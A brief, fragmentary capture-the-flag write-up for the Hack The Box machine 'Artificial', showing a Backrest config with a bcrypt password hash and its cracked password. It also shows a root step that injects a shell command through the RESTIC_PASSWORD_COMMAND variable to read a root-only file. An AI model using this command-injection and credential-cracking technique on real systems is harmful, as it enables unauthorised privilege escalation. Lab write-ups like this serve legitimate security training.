Artificial - Hack The Box Machine
June 2025
User Flag
Download requirements.txt & Dockerfile
Root Flag
{
"modno": 2,
"version": 4,
"instance": "Artificial",
"auth": {
"disabled": false,
"users": [
{
"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
}
]
}
}
base64 decode...
bcrypt hash
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO:!@#$%^
Login as backrest_user with !@#$%^
Add repo with following env var:
RESTIC_PASSWORD_COMMAND=sh -c 'cat /root/root.txt > /tmp/pelele; echo pwned'